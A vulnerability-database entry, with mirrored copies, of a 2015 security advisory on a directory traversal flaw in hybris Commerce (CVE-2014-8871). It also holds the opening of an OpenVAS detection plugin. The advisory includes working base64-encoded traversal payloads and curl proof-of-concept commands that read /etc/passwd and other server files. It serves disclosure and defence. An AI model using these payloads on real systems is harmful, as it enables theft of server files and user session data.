[RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite
2015-02-22T00:00:00
ID SECURITYVULNS:DOC:31726 Type securityvulns Reporter Securityvulns Modified 2015-02-22T00:00:00
Description
Advisory: Directory Traversal and Arbitrary File Disclosure in hybris
Commerce Software Suite
During a penetration test, RedTeam Pentesting discovered a Directory
Traversal vulnerability in hybris Commerce software suite. This
vulnerability allows attackers to download arbitrary files of any size
from the affected system.
"hybris delivers a commerce software suite that is best in class,
helping a company execute all its direct selling processes and present a
single view and a unified experience to all its customers."
(from the vendor's homepage)
More Details
Webshops based on hybris may use an image retrieval system where images
are identified by a URL parameter named "context" rather than a file
name. When this system is used, images can be referenced e.g. like the
following:
Changing the file name part of the URL from "image.jpg" to e.g.
"redteam.jpg" reveals that not the file name part of the URL, but the
value of the parameter "context" is used to select the desired file.
A closer look at the parameter shows that its value is encoded as
Base64. Decoding it reveals a pipe-separated data structure which
includes a file size (third value), a file name (fifth value) and a
SHA-256 hash (sixth value):
During the penetration test many parameters were inspected and it turned
out that the SHA-256 hash is used to reference a particular version of
the file, and can be replaced by a dash ("-") character, which always
returns the latest version. The example request can be modified and
requested with curl as follows:
It was verified that the file name (fifth) value is vulnerable to
directory traversal. This enables attackers to retrieve the contents of
other files from the server's filesystem by using sequences of "../".
The following HTTP request for example delivers the contents of the file
"/etc/passwd":
The size included in the third field of the data structure is used to
limit the number of bytes returned for a file. As it can be modified by
attackers, files of any size with arbitrary content can be downloaded,
provided the path to the file on the server is known. This enables
attackers to read, among others, the environment of the current process
at /proc/self/environ and the list of memory maps including the full
paths to loaded libraries at /proc/self/maps. This way, knowledge about
a particular instance of hybris can be gathered. Afterwards it is
possible to access configuration files like "local.properties" and the
log files for shop orders which also contain the current session-IDs of
users. Furthermore, the Java bytecode of hybris can be downloaded and
decompiled.
Implement a new filter which validates file names and insert this filter
before hybris' own MediaFilter. The new filter should return an error
when a file outside the media directory is requested.
Fix
Upgrade to a fixed hybris version or apply the vendor's hot fix.
Security Risk
This vulnerability can be used to download files from the file system of
the server. This includes, among others, configuration files and the
hybris order logfile, which contains sensitive data. Therefore, the
vulnerability poses a high risk.
Timeline
2014-10-08 Vulnerability identified
2014-10-08 Customer notified vendor
2014-10-29 Vendor released fixed version
2014-11-11 CVE number requested
2014-11-12 Vendor requests more time to notify their customers
2014-11-14 CVE number assigned
2014-12-08 Vendor again requests more time to notify customers
2015-01-12 Vendor notifies customers again, agrees to release advisory
on 2015-02-18
2015-02-17 Vendor requests more time to notify customers for the 3rd
time, RedTeam Pentesting declines
2015-02-18 Advisory released
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.
{"id": "SECURITYVULNS:DOC:31726", "bulletinFamily": "software", "title": "[RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite", "description": "\r\n\r\nAdvisory: Directory Traversal and Arbitrary File Disclosure in hybris\r\n Commerce Software Suite\r\n\r\nDuring a penetration test, RedTeam Pentesting discovered a Directory\r\nTraversal vulnerability in hybris Commerce software suite. This\r\nvulnerability allows attackers to download arbitrary files of any size\r\nfrom the affected system.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: hybris Commerce Software Suite\r\nAffected Versions:\r\n Release 5.3: <= 5.3.0.1\r\n Release 5.2: <= 5.2.0.3\r\n Release 5.1.1: <= 5.1.1.2\r\n Release 5.1: <= 5.1.0.1\r\n Release 5.0.4: <= 5.0.4.4\r\n Release 5.0.3: <= 5.0.3.3\r\n Release 5.0.0: <= 5.0.0.3\r\nFixed Versions:\r\n Release 5.3: 5.3.0.2\r\n Release 5.2: 5.2.0.4\r\n Release 5.1.1: 5.1.1.3\r\n Release 5.1: 5.1.0.2\r\n Release 5.0.4: 5.0.4.5\r\n Release 5.0.3: 5.0.3.4\r\n Release 5.0.0: 5.0.0.4\r\nVulnerability Type: Directory Traversal, Arbitrary File Disclosure\r\nSecurity Risk: high\r\nVendor URL: http://www.hybris.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016\r\nAdvisory Status: published\r\nCVE: CVE-2014-8871\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n"hybris delivers a commerce software suite that is best in class,\r\nhelping a company execute all its direct selling processes and present a\r\nsingle view and a unified experience to all its customers."\r\n\r\n(from the vendor's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nWebshops based on hybris may use an image retrieval system where images\r\nare identified by a URL parameter named "context" rather than a file\r\nname. When this system is used, images can be referenced e.g. like the\r\nfollowing:\r\n\r\n<img src="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl\r\nZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3\r\nYWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200" />\r\n\r\nChanging the file name part of the URL from "image.jpg" to e.g.\r\n"redteam.jpg" reveals that not the file name part of the URL, but the\r\nvalue of the parameter "context" is used to select the desired file.\r\n\r\nA closer look at the parameter shows that its value is encoded as\r\nBase64. Decoding it reveals a pipe-separated data structure which\r\nincludes a file size (third value), a file name (fifth value) and a\r\nSHA-256 hash (sixth value):\r\n\r\n$ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\\r\nZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\\r\n1OTkxYjc4NTJiODU1" | base64 -d\r\n\r\nmaster|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89\r\n96fb92427ae41e4649b934ca495991b7852b855\r\n\r\nDuring the penetration test many parameters were inspected and it turned\r\nout that the SHA-256 hash is used to reference a particular version of\r\nthe file, and can be replaced by a dash ("-") character, which always\r\nreturns the latest version. The example request can be modified and\r\nrequested with curl as follows:\r\n\r\n$ echo -n "master|root|12345|image/jpeg|7415687361172.jpg|-" | base64\r\nbWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt\r\n$ curl -I http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\\r\n8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt\r\n\r\nIt was verified that the file name (fifth) value is vulnerable to\r\ndirectory traversal. This enables attackers to retrieve the contents of\r\nother files from the server's filesystem by using sequences of "../".\r\nThe following HTTP request for example delivers the contents of the file\r\n"/etc/passwd":\r\n\r\n$ echo -n "master|root|12345|text/plain|../../../../../../etc/passwd|-"\\r\n | base64 -w0\r\nbWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz\r\nc3dkfC0=\r\n\r\n$ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\\r\nIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\n[...]\r\n\r\nThe size included in the third field of the data structure is used to\r\nlimit the number of bytes returned for a file. As it can be modified by\r\nattackers, files of any size with arbitrary content can be downloaded,\r\nprovided the path to the file on the server is known. This enables\r\nattackers to read, among others, the environment of the current process\r\nat /proc/self/environ and the list of memory maps including the full\r\npaths to loaded libraries at /proc/self/maps. This way, knowledge about\r\na particular instance of hybris can be gathered. Afterwards it is\r\npossible to access configuration files like "local.properties" and the\r\nlog files for shop orders which also contain the current session-IDs of\r\nusers. Furthermore, the Java bytecode of hybris can be downloaded and\r\ndecompiled.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\n------------------------------------------------------------------------\r\nFILENAME=/etc/passwd\r\ncurl https://www.example.com/medias/redteam?context=$(base64 -w0 <<< \\r\n"master|root|200000000|text/plain|../../../../../..${FILENAME}|-")\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nImplement a new filter which validates file names and insert this filter\r\nbefore hybris' own MediaFilter. The new filter should return an error\r\nwhen a file outside the media directory is requested.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpgrade to a fixed hybris version or apply the vendor's hot fix.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability can be used to download files from the file system of\r\nthe server. This includes, among others, configuration files and the\r\nhybris order logfile, which contains sensitive data. Therefore, the\r\nvulnerability poses a high risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-10-08 Vulnerability identified\r\n2014-10-08 Customer notified vendor\r\n2014-10-29 Vendor released fixed version\r\n2014-11-11 CVE number requested\r\n2014-11-12 Vendor requests more time to notify their customers\r\n2014-11-14 CVE number assigned\r\n2014-12-08 Vendor again requests more time to notify customers\r\n2015-01-12 Vendor notifies customers again, agrees to release advisory\r\n on 2015-02-18\r\n2015-02-17 Vendor requests more time to notify customers for the 3rd\r\n time, RedTeam Pentesting declines\r\n2015-02-18 Advisory released\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity-related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschaftsfuhrer: Patrick Hof, Jens Liebchen\r\n\r\n", "published": "2015-02-22T00:00:00", "modified": "2015-02-22T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31726", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2014-8871"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:57", "edition": 1, "viewCount": 29, "enchantments": {"score": {"value": 6.9, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-8871"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130444"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14273"]}, {"type": "zdt", "idList": ["1337DAY-ID-23305"]}]}, "exploitation": null, "vulnersScore": 6.9}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645346281}}
{"packetstorm": [{"lastseen": "2016-12-05T22:22:55", "description": "", "published": "2015-02-18T00:00:00", "type": "packetstorm", "title": "Hybris Commerce Software Suite 5.x File Disclosure / Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8871"], "modified": "2015-02-18T00:00:00", "id": "PACKETSTORM:130444", "href": "https://packetstormsecurity.com/files/130444/Hybris-Commerce-Software-Suite-5.x-File-Disclosure-Traversal.html", "sourceData": "`Advisory: Directory Traversal and Arbitrary File Disclosure in hybris \nCommerce Software Suite \n \nDuring a penetration test, RedTeam Pentesting discovered a Directory \nTraversal vulnerability in hybris Commerce software suite. This \nvulnerability allows attackers to download arbitrary files of any size \nfrom the affected system. \n \n \nDetails \n======= \n \nProduct: hybris Commerce Software Suite \nAffected Versions: \nRelease 5.3: <= 5.3.0.1 \nRelease 5.2: <= 5.2.0.3 \nRelease 5.1.1: <= 5.1.1.2 \nRelease 5.1: <= 5.1.0.1 \nRelease 5.0.4: <= 5.0.4.4 \nRelease 5.0.3: <= 5.0.3.3 \nRelease 5.0.0: <= 5.0.0.3 \nFixed Versions: \nRelease 5.3: 5.3.0.2 \nRelease 5.2: 5.2.0.4 \nRelease 5.1.1: 5.1.1.3 \nRelease 5.1: 5.1.0.2 \nRelease 5.0.4: 5.0.4.5 \nRelease 5.0.3: 5.0.3.4 \nRelease 5.0.0: 5.0.0.4 \nVulnerability Type: Directory Traversal, Arbitrary File Disclosure \nSecurity Risk: high \nVendor URL: http://www.hybris.com/ \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016 \nAdvisory Status: published \nCVE: CVE-2014-8871 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871 \n \n \nIntroduction \n============ \n \n\"hybris delivers a commerce software suite that is best in class, \nhelping a company execute all its direct selling processes and present a \nsingle view and a unified experience to all its customers.\" \n \n(from the vendor's homepage) \n \n \nMore Details \n============ \n \nWebshops based on hybris may use an image retrieval system where images \nare identified by a URL parameter named \"context\" rather than a file \nname. When this system is used, images can be referenced e.g. like the \nfollowing: \n \n<img src=\"/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl \nZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3 \nYWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1\" alt=\"[...]\" width=\"200\" /> \n \nChanging the file name part of the URL from \"image.jpg\" to e.g. \n\"redteam.jpg\" reveals that not the file name part of the URL, but the \nvalue of the parameter \"context\" is used to select the desired file. \n \nA closer look at the parameter shows that its value is encoded as \nBase64. Decoding it reveals a pipe-separated data structure which \nincludes a file size (third value), a file name (fifth value) and a \nSHA-256 hash (sixth value): \n \n$ echo -n \"bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\\ \nZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\\ \n1OTkxYjc4NTJiODU1\" | base64 -d \n \nmaster|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89 \n96fb92427ae41e4649b934ca495991b7852b855 \n \nDuring the penetration test many parameters were inspected and it turned \nout that the SHA-256 hash is used to reference a particular version of \nthe file, and can be replaced by a dash (\"-\") character, which always \nreturns the latest version. The example request can be modified and \nrequested with curl as follows: \n \n$ echo -n \"master|root|12345|image/jpeg|7415687361172.jpg|-\" | base64 \nbWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt \n$ curl -I http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\\ \n8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt \n \nIt was verified that the file name (fifth) value is vulnerable to \ndirectory traversal. This enables attackers to retrieve the contents of \nother files from the server's filesystem by using sequences of \"../\". \nThe following HTTP request for example delivers the contents of the file \n\"/etc/passwd\": \n \n$ echo -n \"master|root|12345|text/plain|../../../../../../etc/passwd|-\"\\ \n| base64 -w0 \nbWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz \nc3dkfC0= \n \n$ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\\ \nIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0 \n \nroot:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh \nbin:x:2:2:bin:/bin:/bin/sh \n[...] \n \nThe size included in the third field of the data structure is used to \nlimit the number of bytes returned for a file. As it can be modified by \nattackers, files of any size with arbitrary content can be downloaded, \nprovided the path to the file on the server is known. This enables \nattackers to read, among others, the environment of the current process \nat /proc/self/environ and the list of memory maps including the full \npaths to loaded libraries at /proc/self/maps. This way, knowledge about \na particular instance of hybris can be gathered. Afterwards it is \npossible to access configuration files like \"local.properties\" and the \nlog files for shop orders which also contain the current session-IDs of \nusers. Furthermore, the Java bytecode of hybris can be downloaded and \ndecompiled. \n \n \nProof of Concept \n================ \n \n------------------------------------------------------------------------ \nFILENAME=/etc/passwd \ncurl https://www.example.com/medias/redteam?context=$(base64 -w0 <<< \\ \n\"master|root|200000000|text/plain|../../../../../..${FILENAME}|-\") \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nImplement a new filter which validates file names and insert this filter \nbefore hybris' own MediaFilter. The new filter should return an error \nwhen a file outside the media directory is requested. \n \n \nFix \n=== \n \nUpgrade to a fixed hybris version or apply the vendor's hot fix. \n \n \nSecurity Risk \n============= \n \nThis vulnerability can be used to download files from the file system of \nthe server. This includes, among others, configuration files and the \nhybris order logfile, which contains sensitive data. Therefore, the \nvulnerability poses a high risk. \n \n \nTimeline \n======== \n \n2014-10-08 Vulnerability identified \n2014-10-08 Customer notified vendor \n2014-10-29 Vendor released fixed version \n2014-11-11 CVE number requested \n2014-11-12 Vendor requests more time to notify their customers \n2014-11-14 CVE number assigned \n2014-12-08 Vendor again requests more time to notify customers \n2015-01-12 Vendor notifies customers again, agrees to release advisory \non 2015-02-18 \n2015-02-17 Vendor requests more time to notify customers for the 3rd \ntime, RedTeam Pentesting declines \n2015-02-18 Advisory released \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests, short pentests, \nperformed by a team of specialised IT-security experts. Hereby, security \nweaknesses in company networks or products are uncovered and can be \nfixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at \nhttps://www.redteam-pentesting.de. \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "cvss": {"score": 3.7, "vector": "AV:NETWORK/AC:LOW/Au:UNKNOWN/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130444/rt-sa-2014-016.txt"}], "zdt": [{"lastseen": "2018-04-04T03:38:51", "description": "Various Hybris Commerce Software Suite 5.x suffer from a directory traversal vulnerability that allows for arbitrary file disclosure.", "cvss3": {}, "published": "2015-02-18T00:00:00", "type": "zdt", "title": "Hybris Commerce Software Suite 5.x File Disclosure / Traversal Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-8871"], "modified": "2015-02-18T00:00:00", "id": "1337DAY-ID-23305", "href": "https://0day.today/exploit/description/23305", "sourceData": "Directory Traversal and Arbitrary File Disclosure in hybris\r\n Commerce Software Suite\r\n\r\nDuring a penetration test, RedTeam Pentesting discovered a Directory\r\nTraversal vulnerability in hybris Commerce software suite. This\r\nvulnerability allows attackers to download arbitrary files of any size\r\nfrom the affected system.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: hybris Commerce Software Suite\r\nAffected Versions:\r\n Release 5.3: <= 5.3.0.1\r\n Release 5.2: <= 5.2.0.3\r\n Release 5.1.1: <= 5.1.1.2\r\n Release 5.1: <= 5.1.0.1\r\n Release 5.0.4: <= 5.0.4.4\r\n Release 5.0.3: <= 5.0.3.3\r\n Release 5.0.0: <= 5.0.0.3\r\nFixed Versions:\r\n Release 5.3: 5.3.0.2\r\n Release 5.2: 5.2.0.4\r\n Release 5.1.1: 5.1.1.3\r\n Release 5.1: 5.1.0.2\r\n Release 5.0.4: 5.0.4.5\r\n Release 5.0.3: 5.0.3.4\r\n Release 5.0.0: 5.0.0.4\r\nVulnerability Type: Directory Traversal, Arbitrary File Disclosure\r\nSecurity Risk: high\r\nVendor URL: http://www.hybris.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016\r\nAdvisory Status: published\r\nCVE: CVE-2014-8871\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"hybris delivers a commerce software suite that is best in class,\r\nhelping a company execute all its direct selling processes and present a\r\nsingle view and a unified experience to all its customers.\"\r\n\r\n(from the vendor's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nWebshops based on hybris may use an image retrieval system where images\r\nare identified by a URL parameter named \"context\" rather than a file\r\nname. When this system is used, images can be referenced e.g. like the\r\nfollowing:\r\n\r\n<img src=\"/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl\r\nZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3\r\nYWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1\" alt=\"[...]\" width=\"200\" />\r\n\r\nChanging the file name part of the URL from \"image.jpg\" to e.g.\r\n\"redteam.jpg\" reveals that not the file name part of the URL, but the\r\nvalue of the parameter \"context\" is used to select the desired file.\r\n\r\nA closer look at the parameter shows that its value is encoded as\r\nBase64. Decoding it reveals a pipe-separated data structure which\r\nincludes a file size (third value), a file name (fifth value) and a\r\nSHA-256 hash (sixth value):\r\n\r\n$ echo -n \"bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\\\r\nZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\\\r\n1OTkxYjc4NTJiODU1\" | base64 -d\r\n\r\nmaster|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89\r\n96fb92427ae41e4649b934ca495991b7852b855\r\n\r\nDuring the penetration test many parameters were inspected and it turned\r\nout that the SHA-256 hash is used to reference a particular version of\r\nthe file, and can be replaced by a dash (\"-\") character, which always\r\nreturns the latest version. The example request can be modified and\r\nrequested with curl as follows:\r\n\r\n$ echo -n \"master|root|12345|image/jpeg|7415687361172.jpg|-\" | base64\r\nbWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt\r\n$ curl -I http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\\\r\n8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt\r\n\r\nIt was verified that the file name (fifth) value is vulnerable to\r\ndirectory traversal. This enables attackers to retrieve the contents of\r\nother files from the server's filesystem by using sequences of \"../\".\r\nThe following HTTP request for example delivers the contents of the file\r\n\"/etc/passwd\":\r\n\r\n$ echo -n \"master|root|12345|text/plain|../../../../../../etc/passwd|-\"\\\r\n | base64 -w0\r\nbWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz\r\nc3dkfC0=\r\n\r\n$ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\\\r\nIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\n[...]\r\n\r\nThe size included in the third field of the data structure is used to\r\nlimit the number of bytes returned for a file. As it can be modified by\r\nattackers, files of any size with arbitrary content can be downloaded,\r\nprovided the path to the file on the server is known. This enables\r\nattackers to read, among others, the environment of the current process\r\nat /proc/self/environ and the list of memory maps including the full\r\npaths to loaded libraries at /proc/self/maps. This way, knowledge about\r\na particular instance of hybris can be gathered. Afterwards it is\r\npossible to access configuration files like \"local.properties\" and the\r\nlog files for shop orders which also contain the current session-IDs of\r\nusers. Furthermore, the Java bytecode of hybris can be downloaded and\r\ndecompiled.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\n------------------------------------------------------------------------\r\nFILENAME=/etc/passwd\r\ncurl https://www.example.com/medias/redteam?context=$(base64 -w0 <<< \\\r\n\"master|root|200000000|text/plain|../../../../../..${FILENAME}|-\")\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nImplement a new filter which validates file names and insert this filter\r\nbefore hybris' own MediaFilter. The new filter should return an error\r\nwhen a file outside the media directory is requested.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpgrade to a fixed hybris version or apply the vendor's hot fix.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability can be used to download files from the file system of\r\nthe server. This includes, among others, configuration files and the\r\nhybris order logfile, which contains sensitive data. Therefore, the\r\nvulnerability poses a high risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-10-08 Vulnerability identified\r\n2014-10-08 Customer notified vendor\r\n2014-10-29 Vendor released fixed version\r\n2014-11-11 CVE number requested\r\n2014-11-12 Vendor requests more time to notify their customers\r\n2014-11-14 CVE number assigned\r\n2014-12-08 Vendor again requests more time to notify customers\r\n2015-01-12 Vendor notifies customers again, agrees to release advisory\r\n on 2015-02-18\r\n2015-02-17 Vendor requests more time to notify customers for the 3rd\r\n time, RedTeam Pentesting declines\r\n2015-02-18 Advisory released\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/23305", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2020-05-08T11:01:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-8871"], "description": "hybris Commerce Software Suite is vulnerable to a\n directory traversal attack.", "modified": "2020-05-05T00:00:00", "published": "2015-02-25T00:00:00", "id": "OPENVAS:1361412562310105955", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105955", "type": "openvas", "title": "hybris Commerce Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# hybris Commerce Directory Traversal Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105955\");\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-02-25 14:49:12 +0700 (Wed, 25 Feb 2015)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2014-8871\");\n script_bugtraq_id(72681);\n\n script_name(\"hybris Commerce Directory Traversal Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"summary\", value:\"hybris Commerce Software Suite is vulnerable to a\n directory traversal attack.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP\n GET request and check whether it is possible to access local files.\");\n\n script_tag(name:\"insight\", value:\"Webshops based on hybris may use an file retrieval\n system where files are identified by a URL parameter named 'context' rather than a file\n name. The context is base64 encoded and consists among other parameters the file name.\n This file name is vulnerable to directory traversal.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker can retrieve arbitrary files\n which might consist sensitive data which can be used for further attacks.\");\n\n script_tag(name:\"affected\", value:\"hybris Commerce Software Suite Releases 5.0.0, 5.0.3,\n 5.0.4, 5.1, 5.1.1, 5.2 and 5.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Release 5.0.0.4, 5.0.3.4, 5.0.4.5, 5.1.0.2,\n 5.1.1.3, 5.2.0.4, 5.3.0.2 or higher.\");\n\n 